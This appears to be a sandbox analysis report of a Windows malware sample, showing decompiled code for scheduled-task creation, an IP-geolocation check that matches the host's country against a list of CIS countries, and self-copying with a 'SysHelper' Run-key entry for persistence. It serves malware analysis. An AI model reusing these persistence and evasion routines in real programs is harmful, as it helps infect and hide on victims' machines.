																											_t341 =  *((intOrPtr*)( *_t340 + 0x44))(_t340,  &_v52);
																											__eflags = _t341;
																											if(_t341 < 0) {
																												goto L73;
																											} else {
																												_t342 = _v52;
																												_v72 = 0;
																												_t343 =  *((intOrPtr*)( *_t342 + 0x30))(_t342, 0,  &_v72);
																												_t457 = _v52;
																												 *((intOrPtr*)( *_t457 + 8))(_t457);
																												__eflags = _t343;
																												if(_t343 < 0) {
																													goto L73;
																												} else {
																													_t345 = _v72;
																													_v44 = 0;
																													_t346 =  *((intOrPtr*)( *_t345))(_t345, 0x4d511c,  &_v44);
																													_t459 = _v72;
																													 *((intOrPtr*)( *_t459 + 8))(_t459);
																													__eflags = _t346;
																													if(_t346 < 0) {
																														goto L73;
																													} else {
																														__eflags = _v100 - 8;
																														_t349 =  >=  ? _v120 :  &_v120;
																														_t350 = E0040B140(_t397,  &_v28, _v100 - 8,  >=  ? _v120 :  &_v120); // executed
																														_v8 = 0x10;
																														_t511 =  *_t350;
																														__eflags = _t511;
																														if(_t511 == 0) {
																															_t512 = 0;
																															__eflags = 0;
																														} else {
																															_t512 =  *_t511;
																														}
																														_t351 = _v44;
																														_t352 =  *((intOrPtr*)( *_t351 + 0x2c))(_t351, _t512);
																														_v8 = 1;
																														E0040B1D0( &_v28, _t512);
																														__eflags = _t352;
																														if(__eflags >= 0) {
																															_t354 = E0040B140(_t397,  &_v28, __eflags, L"--Task");
																															_v8 = 0x11;
																															_t355 =  *_t354;
																															__eflags = _t355;
																															if(_t355 == 0) {
																																_t513 = 0;
																																__eflags = 0;
																															} else {
																																_t513 =  *_t355;
																															}
																															_t356 = _v44;
																															_t357 =  *((intOrPtr*)( *_t356 + 0x34))(_t356, _t513);
																															_v8 = 1;
																															_t539 = _t357;
																															E0040B1D0( &_v28, _t513);
																															_t466 = _v44;
																															 *((intOrPtr*)( *_t466 + 8))(_t466);
																															__eflags = _t357;
																															if(_t357 < 0) {
																																goto L73;
																															} else {
																																_v96 = 0;
																																E0040B400( &_v172, _t539, _t466);
																																asm("movdqu xmm0, [eax]");
																																asm("movdqu [ebp-0xd8], xmm0");
																																 *_t397( &_v140);
																																asm("movdqu xmm0, [ebp-0x88]");
																																asm("movdqu [ebp-0xc8], xmm0");
																																 *_t397( &_v156);
																																_v8 = 0x14;
																																asm("movdqu xmm0, [ebp-0x98]");
																																asm("movdqu [ebp-0xb8], xmm0");
																																_t365 = E0040B140(_t397,  &_v28, __eflags, L"Time Trigger Task");
																																_v8 = 0x15;
																																_t540 =  *_t365;
																																__eflags = _t540;
																																if(_t540 == 0) {
																																	_t541 = 0;
																																	__eflags = 0;
																																} else {
																																	_t541 =  *_t540;
																																}
																																asm("movdqu xmm0, [ebp-0xd8]");
																																_t469 = _v24;
																																asm("movdqu [eax], xmm0");
																																_t544 = _t544 - 0xfffffffffffffff0;
																																asm("movdqu xmm0, [ebp-0xc8]");
																																asm("movdqu [eax], xmm0");
																																asm("movdqu xmm0, [ebp-0xb8]");
																																asm("movdqu [eax], xmm0");
																																_t542 =  *((intOrPtr*)( *_t469 + 0x44))(_t469, _t541, _v20, 6, 3,  &_v96);
																																E0040B1D0( &_v28,  *_t469);
																																_t398 = __imp__#9;
																																 *_t398( &_v156);
																																 *_t398( &_v140);
																																_v8 = 1;
																																 *_t398( &_v172);
																																__eflags = _t542;
																																if(_t542 >= 0) {
																																	_t378 = _v24;
																																	 *((intOrPtr*)( *_t378 + 8))(_t378);
																																	_t380 = _v20;
																																	 *((intOrPtr*)( *_t380 + 8))(_t380);
																																	_t382 = _v96;
																																	 *((intOrPtr*)( *_t382 + 8))(_t382);
																																	__imp__CoUninitialize(); // executed
																																	_t395 = 1;
																																} else {
																																	swprintf( &_v1348, 0x400, "RegisterTaskDefinition. Err: %X\n", _t542);
																																	_t544 = _t544 + 0x10;
																																	goto L73;
																																}
																															}
																														} else {
																															_t386 = _v44;
																															 *((intOrPtr*)( *_t386 + 8))(_t386);
																															goto L73;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								} else {
									_t388 = _v24;
									 *((intOrPtr*)( *_t388 + 8))(_t388);
									__imp__CoUninitialize();
									_t395 = 0;
								}
							} else {
								_t390 = _v32;
								 *((intOrPtr*)( *_t390 + 8))(_t390);
								__imp__CoUninitialize();
								_t395 = 0;
							}
						} else {
							_t392 = _v32;
							 *((intOrPtr*)( *_t392 + 8))(_t392);
							__imp__CoUninitialize();
							_t395 = 0;
						}
					}
					__eflags = _v100 - 8;
					if(_v100 >= 8) {
						L00422587(_v120);
						_t544 = _t544 + 4;
					}
					__eflags = 0;
					_v100 = 7;
					_v104 = 0;
					_v120 = 0;
				} else {
					_t395 = 0;
				}
				if(_a24 >= 8) {
					L00422587(_a4);
				}
				 *[fs:0x0] = _v16;
				return _t395;
			}

0x0040d24a
0x0040d251
0x0040d258
0x0040d261
0x0040d265
0x0040d26c
0x0040d274
0x0040d28f
0x0040d297
0x0040d2a1
0x0040d2ab
0x0040d2b3
0x0040d2b8
0x0040d2bb
0x0040d2ce
0x0040d2d5
0x0040d2db
0x0040d2dd
0x0040da3c
0x0040da3c
0x0040da42
0x0040d2e3
0x0040d2e3
0x0040d2f0
0x0040d2f2
0x0040d301
0x0040d309
0x0040d30b
0x0040d31a
0x0040d322
0x0040d324
0x0040d333
0x0040d33b
0x0040d33d
0x0040d344
0x0040d34c
0x0040d356
0x0040d35f
0x0040d367
0x0040d36d
0x0040d370
0x0040d378
0x0040d37e
0x0040d387
0x0040d38b
0x0040d397
0x0040d3a4
0x0040d3b1
0x0040d3bd
0x0040d3c2
0x0040d3c8
0x0040d3ca
0x0040d3ea
0x0040d3f1
0x0040d3f6
0x0040d3fa
0x0040d3fc
0x0040d3fe
0x0040d404
0x0040d404
0x0040d400
0x0040d400
0x0040d400
0x0040d406
0x0040d411
0x0040d417
0x0040d41d
0x0040d422
0x0040d424
0x0040d444
0x0040d449
0x0040d44d
0x0040d44f
0x0040d451
0x0040d457
0x0040d457
0x0040d453
0x0040d453
0x0040d453
0x0040d459
0x0040d462
0x0040d468
0x0040d46c
0x0040d471
0x0040d478
0x0040d484
0x0040d487
0x0040d48f
0x0040d492
0x0040d494
0x0040d4ac
0x0040d4b2
0x0040d4c0
0x0040d4c2
0x0040da2a
0x0040da2a
0x0040da30
0x0040da33
0x0040da39
0x00000000
0x0040d4c8
0x0040d4d0
0x0040d4d5
0x0040d4d9
0x0040d4db
0x0040d4dd
0x0040d4e3
0x0040d4e3
0x0040d4df
0x0040d4df
0x0040d4df
0x0040d4e5
0x0040d4ec
0x0040d4f2
0x0040d4f8
0x0040d4fd
0x0040d503
0x0040d506
0x0040d508
0x00000000
0x0040d50e
0x0040d50e
0x0040d514
0x0040d51f
0x0040d522
0x0040d524
0x00000000
0x0040d52a
0x0040d52a
0x0040d532
0x0040d535
0x0040d53d
0x0040d540
0x0040d542
0x00000000
0x0040d548
0x0040d548
0x0040d54e
0x0040d559
0x0040d55c
0x0040d55e
0x00000000
0x0040d564
0x0040d564
0x0040d56c
0x0040d56f
0x0040d577
0x0040d57a
0x0040d57c
0x00000000
0x0040d582
0x0040d582
0x0040d588
0x0040d599
0x0040d59b
0x00000000
0x0040d5a1
0x0040d5a9
0x0040d5ae
0x0040d5b2
0x0040d5b4
0x0040d5b6
0x0040d5bc
0x0040d5bc
0x0040d5b8
0x0040d5b8
0x0040d5b8
0x0040d5be
0x0040d5c5
0x0040d5cb
0x0040d5d1
0x0040d5d6
0x0040d5dc
0x0040d5df
0x0040d5e1
0x00000000
0x0040d5e7
0x0040d5e7
0x0040d5ed
0x0040d5f8
0x0040d5fb
0x0040d5fd
0x00000000
0x0040d603
0x0040d603
0x0040d60a
0x0040d616
0x0040d619
0x0040d621
0x0040d624
0x0040d626
0x00000000
0x0040d62c
0x0040d62c
0x0040d633
0x0040d642
0x0040d644
0x0040d64c
0x0040d64f
0x0040d651
0x00000000
0x0040d657
0x0040d657
0x0040d664
0x0040d666
0x00000000
0x0040d66c
0x0040d674
0x0040d679
0x0040d67d
0x0040d67f
0x0040d681
0x0040d687
0x0040d687
0x0040d683
0x0040d683
0x0040d683
0x0040d689
0x0040d690
0x0040d696
0x0040d69c
0x0040d6a1
0x0040d6a3
0x00000000
0x0040d6a9
0x0040d6b1
0x0040d6b6
0x0040d6ba
0x0040d6bc
0x0040d6be
0x0040d6c4
0x0040d6c4
0x0040d6c0
0x0040d6c0
0x0040d6c0
0x0040d6c6
0x0040d6cd
0x0040d6d3
0x0040d6d9
0x0040d6de
0x0040d6e0
0x00000000
0x0040d6e6
0x0040d6e6
0x0040d6f2
0x0040d6f4
0x00000000
0x0040d6fa
0x0040d702
0x0040d707
0x0040d70b
0x0040d70d
0x0040d70f
0x0040d715
0x0040d715
0x0040d711
0x0040d711
0x0040d711
0x0040d717
0x0040d71e
0x0040d724
0x0040d72a
0x0040d72f
0x0040d731
0x00000000
0x0040d737
0x0040d73f
0x0040d744
0x0040d748
0x0040d74a
0x0040d74c
0x0040d752
0x0040d752
0x0040d74e
0x0040d74e
0x0040d74e
0x0040d754
0x0040d75b
0x0040d761
0x0040d767
0x0040d76c
0x0040d76e
0x00000000
0x0040d774
0x0040d778
0x0040d77f
0x0040d780
0x0040d787
0x0040d78a
0x0040d79e
0x0040d7a9
0x0040d7b0
0x0040d7be
0x0040d7c3
0x0040d7c6
0x0040d7ca
0x0040d7ce
0x0040d7d0
0x0040d7d0
0x0040d7d6
0x0040d7db
0x0040d7df
0x0040d7e1
0x0040d7e3
0x0040d7e9
0x0040d7e9
0x0040d7e5
0x0040d7e5
0x0040d7e5
0x0040d7eb
0x0040d7f2
0x0040d7fa
0x0040d805
0x0040d809
0x0040d80e
0x0040d814
0x0040d817
0x0040d819
0x00000000
0x0040d81f
0x0040d81f
0x0040d825
0x0040d830
0x0040d833
0x0040d835
0x00000000
0x0040d83b
0x0040d83b
0x0040d842
0x0040d84e
0x0040d851
0x0040d859
0x0040d85c
0x0040d85e
0x00000000
0x0040d864
0x0040d864
0x0040d86b
0x0040d87a
0x0040d87c
0x0040d884
0x0040d887
0x0040d889
0x00000000
0x0040d88f
0x0040d88f
0x0040d899
0x0040d89e
0x0040d8a3
0x0040d8a7
0x0040d8a9
0x0040d8ab
0x0040d8b1
0x0040d8b1
0x0040d8ad
0x0040d8ad
0x0040d8ad
0x0040d8b3
0x0040d8ba
0x0040d8c0
0x0040d8c6
0x0040d8cb
0x0040d8cd
0x0040d8e5
0x0040d8ea
0x0040d8ee
0x0040d8f0
0x0040d8f2
0x0040d8f8
0x0040d8f8
0x0040d8f4
0x0040d8f4
0x0040d8f4
0x0040d8fa
0x0040d901
0x0040d907
0x0040d90b
0x0040d90d
0x0040d912
0x0040d918
0x0040d91b
0x0040d91d
0x00000000
0x0040d923
0x0040d92a
0x0040d931
0x0040d936
0x0040d941
0x0040d949
0x0040d94b
0x0040d95a
0x0040d962
0x0040d964
0x0040d96b
0x0040d978
0x0040d980
0x0040d985
0x0040d989
0x0040d98b
0x0040d98d
0x0040d993
0x0040d993
0x0040d98f
0x0040d98f
0x0040d98f
0x0040d995
0x0040d99d
0x0040d9b0
0x0040d9b6
0x0040d9b9
0x0040d9c1
0x0040d9c7
0x0040d9d4
0x0040d9e0
0x0040d9e2
0x0040d9e7
0x0040d9f4
0x0040d9fd
0x0040da05
0x0040da0a
0x0040da0c
0x0040da0e
0x0040da46
0x0040da4c
0x0040da4f
0x0040da55
0x0040da58
0x0040da5e
0x0040da61
0x0040da67
0x0040da10
0x0040da22
0x0040da27
0x00000000
0x0040da27
0x0040da0e
0x0040d8cf
0x0040d8cf
0x0040d8d5
0x00000000
0x0040d8d5
0x0040d8cd
0x0040d889
0x0040d85e
0x0040d835
0x0040d819
0x0040d76e
0x0040d731
0x0040d6f4
0x0040d6e0
0x0040d6a3
0x0040d666
0x0040d651
0x0040d626
0x0040d5fd
0x0040d5e1
0x0040d59b
0x0040d57c
0x0040d55e
0x0040d542
0x0040d524
0x0040d508
0x0040d496
0x0040d496
0x0040d49c
0x0040d49f
0x0040d4a5
0x0040d4a5
0x0040d426
0x0040d426
0x0040d42c
0x0040d42f
0x0040d435
0x0040d435
0x0040d3cc
0x0040d3cc
0x0040d3d2
0x0040d3d5
0x0040d3db
0x0040d3db
0x0040d3ca
0x0040da69
0x0040da6d
0x0040da72
0x0040da77
0x0040da77
0x0040da7a
0x0040da7c
0x0040da83
0x0040da8a
0x0040d276
0x0040d276
0x0040d276
0x0040da92
0x0040da97
0x0040da9c
0x0040daa6
0x0040dab1

APIs

CoInitialize.OLE32(00000000), ref: 0040D26C
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
VariantInit.OLEAUT32(?), ref: 0040D2F0
VariantInit.OLEAUT32(?), ref: 0040D309
VariantInit.OLEAUT32(?), ref: 0040D322
VariantInit.OLEAUT32(?), ref: 0040D33B
VariantClear.OLEAUT32(?), ref: 0040D397
VariantClear.OLEAUT32(?), ref: 0040D3A4
VariantClear.OLEAUT32(?), ref: 0040D3B1
VariantClear.OLEAUT32(?), ref: 0040D3C2
CoUninitialize.OLE32 ref: 0040D3D5

Strings

Time Trigger Task, xrefs: 0040D43C, 0040D973
--Task, xrefs: 0040D8DD
2030-05-02T08:00:00, xrefs: 0040D737
Author Name, xrefs: 0040D4C8
Trigger1, xrefs: 0040D6FA
RegisterTaskDefinition. Err: %X, xrefs: 0040DA11
%Y-%m-%dT%H:%M:%S, xrefs: 0040D790
PT5M, xrefs: 0040D5A1, 0040D66C

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
API String ID: 2496729271-1738591096
Opcode ID: 91b019c5935dec928dbdb430247d959dffb87e455ec463222d5833ff72902b6d
Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
Opcode Fuzzy Hash: 91b019c5935dec928dbdb430247d959dffb87e455ec463222d5833ff72902b6d
Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF10 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 228
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E0040CF10() {
				WCHAR* _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				WCHAR* _v24;
				char _v40;
				intOrPtr _v44;
				WCHAR* _v48;
				char _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				char _v88;
				intOrPtr _v92;
				WCHAR* _v96;
				char _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				char _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				long _v156;
				char _v10395;
				void _v10396;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t90;
				void* _t95;
				intOrPtr _t102;
				intOrPtr _t119;
				signed int _t122;
				void* _t128;
				WCHAR* _t129;
				WCHAR* _t131;
				intOrPtr* _t134;
				void* _t135;
				void* _t142;
				void* _t146;
				intOrPtr* _t147;
				void* _t149;
				signed int _t151;
				void* _t152;
				void* _t153;
				intOrPtr* _t157;
				void* _t158;
				void* _t159;
				intOrPtr _t160;
				void* _t161;

				_push(0xffffffff);
				_push(0x4ca850);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t160;
				E0042F7C0(0x2890);
				_push(_t128);
				_push(_t152);
				_v10396 = 0;
				E0042B420( &_v10395, 0, 0x27ff);
				_t161 = _t160 + 0xc;
				_t90 = InternetOpenW(L"Microsoft Internet Explorer", 0, 0, 0, 0); // executed
				_t149 = _t90;
				_v92 = 7;
				_push(0x1b);
				_v96 = 0;
				_v112 = 0;
				E00415C10(_t128,  &_v112, _t149, _t152, L"https://api.2ip.ua/geo.json");
				_v8 = 0;
				_t94 =  >=  ? _v112 :  &_v112;
				_t95 = InternetOpenUrlW(_t149,  >=  ? _v112 :  &_v112, 0, 0, 0, 0); // executed
				_t153 = _t95;
				if(_t153 != 0) {
					InternetReadFile(_t153,  &_v10396, 0x2800,  &_v156); // executed
					InternetCloseHandle(_t153);
					InternetCloseHandle(_t149);
					_push(0x10);
					_v44 = 0xf;
					_v48 = 0;
					_v64 = 0;
					E004156D0(_t128,  &_v64, _t149, "\"country_code\":\"");
					_v8 = 1;
					_v20 = 0xf;
					_v24 = 0;
					_v40 = 0;
					if(_v10396 != 0) {
						_t134 =  &_v10396;
						_t23 = _t134 + 1; // 0x1
						_t146 = _t23;
						do {
							_t102 =  *_t134;
							_t134 = _t134 + 1;
						} while (_t102 != 0);
						_t135 = _t134 - _t146;
					} else {
						_t135 = 0;
					}
					_push(_t135);
					E004156D0(_t128,  &_v40, _t149,  &_v10396);
					_v8 = 2;
					_t106 =  >=  ? _v64 :  &_v64;
					if(E00414300( &_v40,  >=  ? _v64 :  &_v64, 0, _v48) == 0xffffffff) {
						L30:
						_t129 = 0;
					} else {
						_t156 = E00413010( &_v40,  &_v136, _t107 + _v48, 0xa);
						if( &_v40 != _t114) {
							if(_v20 >= 0x10) {
								L00422587(_v40);
								_t161 = _t161 + 4;
							}
							_v20 = 0xf;
							_v24 = 0;
							_v40 = 0;
							E00413D40( &_v40, _t156);
						}
						if(_v116 >= 0x10) {
							L00422587(_v136);
							_t161 = _t161 + 4;
						}
						if(E00414300( &_v40, "\"", 0, 1) == 0xffffffff) {
							goto L30;
						} else {
							E00413010( &_v40,  &_v88, 0, _t116);
							_t131 = _v72;
							_t151 = 0;
							_v152 = "RU";
							_v148 = "BY";
							_v144 = "UA";
							_v140 = "AZ";
							_v136 = "AM";
							_v132 = "TJ";
							_v128 = "KZ";
							_v124 = "KG";
							_v120 = "UZ";
							_v116 = "SY";
							do {
								_t147 =  *((intOrPtr*)(_t159 + _t151 * 4 - 0x94));
								if( *_t147 != 0) {
									_t157 = _t147;
									_t61 = _t157 + 1; // 0x500005
									_t142 = _t61;
									do {
										_t119 =  *_t157;
										_t157 = _t157 + 1;
									} while (_t119 != 0);
									_t158 = _t157 - _t142;
								} else {
									_t158 = 0;
								}
								_t144 =  >=  ? _v88 :  &_v88;
								_t121 =  <  ? _t131 : _t158;
								_t122 = E0040B650( >=  ? _v88 :  &_v88, _t147,  <  ? _t131 : _t158);
								_t161 = _t161 + 4;
								if(_t122 != 0 || _t131 < _t158 || (_t122 & 0xffffff00 | _t131 != _t158) != 0) {
									goto L24;
								} else {
									_t129 = 1;
								}
								L26:
								if(_v68 >= 0x10) {
									L00422587(_v88);
									_t161 = _t161 + 4;
								}
								_v68 = 0xf;
								_v72 = 0;
								_v88 = 0;
								goto L31;
								L24:
								_t151 = _t151 + 1;
							} while (_t151 < 9);
							_t129 = 0;
							goto L26;
						}
					}
					L31:
					if(_v20 >= 0x10) {
						L00422587(_v40);
						_t161 = _t161 + 4;
					}
					_v20 = 0xf;
					_v24 = 0;
					_v40 = 0;
					if(_v44 >= 0x10) {
						L00422587(_v64);
						_t161 = _t161 + 4;
					}
					_v44 = 0xf;
					_v48 = 0;
					_v64 = 0;
				} else {
					_t129 = 0;
				}
				if(_v92 >= 8) {
					L00422587(_v112);
				}
				 *[fs:0x0] = _v16;
				return _t129;
			}

0x0040cf19
0x0040cf1b
0x0040cf20
0x0040cf26
0x0040cf2d
0x0040cf32
0x0040cf33
0x0040cf40
0x0040cf4a
0x0040cf4f
0x0040cf5f
0x0040cf65
0x0040cf67
0x0040cf6e
0x0040cf72
0x0040cf81
0x0040cf85
0x0040cf8e
0x0040cf9e
0x0040cfa6
0x0040cfac
0x0040cfb0
0x0040cfcd
0x0040cfda
0x0040cfdd
0x0040cfdf
0x0040cfe9
0x0040cff0
0x0040cff7
0x0040cffb
0x0040d000
0x0040d00b
0x0040d012
0x0040d019
0x0040d01d
0x0040d023
0x0040d029
0x0040d029
0x0040d030
0x0040d030
0x0040d032
0x0040d033
0x0040d037
0x0040d01f
0x0040d01f
0x0040d01f
0x0040d039
0x0040d044
0x0040d049
0x0040d05c
0x0040d069
0x0040d1cb
0x0040d1cb
0x0040d06f
0x0040d084
0x0040d08b
0x0040d091
0x0040d096
0x0040d09b
0x0040d09b
0x0040d0a2
0x0040d0a9
0x0040d0b0
0x0040d0b4
0x0040d0b4
0x0040d0bd
0x0040d0c5
0x0040d0ca
0x0040d0ca
0x0040d0e1
0x00000000
0x0040d0e7
0x0040d0f1
0x0040d0f6
0x0040d0f9
0x0040d0fb
0x0040d105
0x0040d10f
0x0040d119
0x0040d123
0x0040d12d
0x0040d134
0x0040d13b
0x0040d142
0x0040d149
0x0040d150
0x0040d150
0x0040d15a
0x0040d160
0x0040d162
0x0040d162
0x0040d165
0x0040d165
0x0040d167
0x0040d168
0x0040d16c
0x0040d15c
0x0040d15c
0x0040d15c
0x0040d177
0x0040d17d
0x0040d181
0x0040d186
0x0040d18b
0x00000000
0x0040d1c7
0x0040d1c7
0x0040d1c7
0x0040d1a2
0x0040d1a6
0x0040d1ab
0x0040d1b0
0x0040d1b0
0x0040d1b3
0x0040d1ba
0x0040d1c1
0x00000000
0x0040d19a
0x0040d19a
0x0040d19b
0x0040d1a0
0x00000000
0x0040d1a0
0x0040d0e1
0x0040d1cd
0x0040d1d1
0x0040d1d6
0x0040d1db
0x0040d1db
0x0040d1e2
0x0040d1e9
0x0040d1f0
0x0040d1f4
0x0040d1f9
0x0040d1fe
0x0040d1fe
0x0040d201
0x0040d208
0x0040d20f
0x0040cfb2
0x0040cfb2
0x0040cfb2
0x0040d217
0x0040d21c
0x0040d221
0x0040d22b
0x0040d236

APIs

_memset.LIBCMT ref: 0040CF4A
InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
InternetCloseHandle.WININET(00000000), ref: 0040CFDA
InternetCloseHandle.WININET(00000000), ref: 0040CFDD

Strings

https://api.2ip.ua/geo.json, xrefs: 0040CF79
"country_code":", xrefs: 0040CFE1
Microsoft Internet Explorer, xrefs: 0040CF5A

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead_memset
String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
API String ID: 1485416377-2962370585
Opcode ID: dbd7b7030c2563d0bba2431fd1a5fbef27bdcf180177bf6ef3c780b563408933
Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
Opcode Fuzzy Hash: dbd7b7030c2563d0bba2431fd1a5fbef27bdcf180177bf6ef3c780b563408933
Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00411CD0 Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00411CD0(void* __ebx, void* __edx, intOrPtr _a4) {
				long _v8;
				intOrPtr _v16;
				WCHAR* _v24;
				void* _v28;
				void* _v32;
				int _v36;
				intOrPtr _v40;
				WCHAR* _v44;
				char _v60;
				int _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				char _v88;
				int _v92;
				intOrPtr _v96;
				WCHAR* _v100;
				char _v116;
				intOrPtr _v120;
				char _v140;
				struct _PROCESS_INFORMATION _v156;
				char _v172;
				struct _STARTUPINFOW _v248;
				short _v2296;
				char _v4342;
				short _v4344;
				char _v6390;
				char _v6392;
				short _v8440;
				short _v12536;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t124;
				intOrPtr _t133;
				_Unknown_base(*)()* _t137;
				short _t150;
				intOrPtr _t160;
				long _t171;
				int _t202;
				intOrPtr _t207;
				void* _t213;
				void* _t221;
				intOrPtr* _t223;
				signed int _t225;
				WCHAR* _t228;
				signed int _t230;
				intOrPtr* _t232;
				signed int _t234;
				intOrPtr* _t237;
				signed int _t239;
				intOrPtr _t242;
				void* _t245;
				WCHAR* _t246;
				void* _t247;
				void* _t248;
				void* _t250;
				void* _t253;
				void* _t257;
				intOrPtr _t263;
				void* _t264;
				void* _t266;

				_t221 = __ebx;
				_push(0xffffffff);
				_push(0x4cac68);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t263;
				E0042F7C0(0x30e8);
				_push(_t253);
				_v32 = 0;
				_t250 = __edx; // executed
				_t124 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0xf003f,  &_v32); // executed
				if(_t124 != 0) {
					L50:
					 *[fs:0x0] = _v16;
					return _t124;
				}
				_v6392 = _t124;
				_v36 = 1;
				E0042B420( &_v6390, _t124, 0x7fe);
				_t264 = _t263 + 0xc;
				_v64 = 0x400;
				RegQueryValueExW(_v32, L"SysHelper", 0,  &_v36,  &_v6392,  &_v64); // executed
				RegCloseKey(_v32);
				_v40 = 7;
				_v44 = 0;
				_v60 = 0;
				if(_v6392 != 0) {
					_t223 =  &_v6392;
					_t245 = _t223 + 2;
					do {
						_t133 =  *_t223;
						_t223 = _t223 + 2;
					} while (_t133 != 0);
					_t225 = _t223 - _t245 >> 1;
					L6:
					_push(_t225);
					E00415C10(_t221,  &_v60, _t250, _t253,  &_v6392);
					_v8 = 0;
					_t255 = _v44;
					if(_v44 == 0) {
						L19:
						_v8 = 0xffffffff;
						if(_v40 >= 8) {
							L00422587(_v60);
							_t264 = _t264 + 4;
						}
						_t137 = GetProcAddress(LoadLibraryW(L"Shell32.dll"), "SHGetFolderPathW");
						_t256 = _t137;
						_v92 = 0;
						lstrcpyW( &_v8440,  *(CommandLineToArgvW(GetCommandLineW(),  &_v92)));
						_v36 = PathFindFileNameW( &_v8440);
						 *_t137(0, 0x1c, 0, 0,  &_v2296);
						__imp__UuidCreate( &_v172);
						_v24 = 0;
						__imp__UuidToStringW( &_v172,  &_v24);
						_t246 = _v24;
						_v96 = 7;
						_v100 = 0;
						_v116 = 0;
						if( *_t246 != 0) {
							_t228 = _t246;
							_t57 =  &(_t228[1]); // 0x2
							_t256 = _t57;
							do {
								_t150 =  *_t228;
								_t228 =  &(_t228[1]);
							} while (_t150 != 0);
							_t230 = _t228 - _t256 >> 1;
							goto L26;
						} else {
							_t230 = 0;
							L26:
							E00415C10(_t221,  &_v116, _t250, _t256, _t246);
							_v8 = 1;
							__imp__RpcStringFreeW( &_v24, _t230);
							_t257 = PathAppendW;
							_t154 =  >=  ? _v116 :  &_v116;
							PathAppendW( &_v2296,  >=  ? _v116 :  &_v116);
							CreateDirectoryW( &_v2296, 0); // executed
							if(_t250 == 0) {
								L33:
								_v68 = 7;
								_v72 = 0;
								_v88 = 0;
								if(_v2296 != 0) {
									_t232 =  &_v2296;
									_t247 = _t232 + 2;
									do {
										_t160 =  *_t232;
										_t232 = _t232 + 2;
									} while (_t160 != 0);
									_t234 = _t232 - _t247 >> 1;
									L38:
									_push(_t234);
									E00415C10(_t221,  &_v88, _t250, _t257,  &_v2296);
									_v8 = 2;
									PathAppendW( &_v2296, _v36);
									DeleteFileW( &_v2296); // executed
									CopyFileW( &_v8440,  &_v2296, 0); // executed
									_v28 = 0;
									_t171 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0xf003f,  &_v28); // executed
									if(_t171 != 0) {
										L45:
										if(_v68 >= 8) {
											L00422587(_v88);
											_t264 = _t264 + 4;
										}
										_t124 = 0;
										_v68 = 7;
										_v72 = 0;
										_v88 = 0;
										if(_v96 >= 8) {
											_push(_v116);
											L49:
											_t124 = L00422587();
										}
										goto L50;
									}
									_v4344 = _t171;
									E0042B420( &_v4342, _t171, 0x7fe);
									_t266 = _t264 + 0xc;
									lstrcpyW( &_v4344, "\"");
									lstrcatW( &_v4344,  &_v2296);
									lstrcatW( &_v4344, L"\" --AutoStart");
									RegSetValueExW(_v28, L"SysHelper", 0, 2,  &_v4344, lstrlenW( &_v4344) + _t183); // executed
									RegCloseKey(_v28);
									_t236 = _a4;
									if(_a4 != 0) {
										E00413260(_t236, lstrcpyW,  &_v2296);
									}
									E0042B420( &_v248, 0, 0x44);
									_t264 = _t266 + 0xc;
									_v248.cb = 0x44;
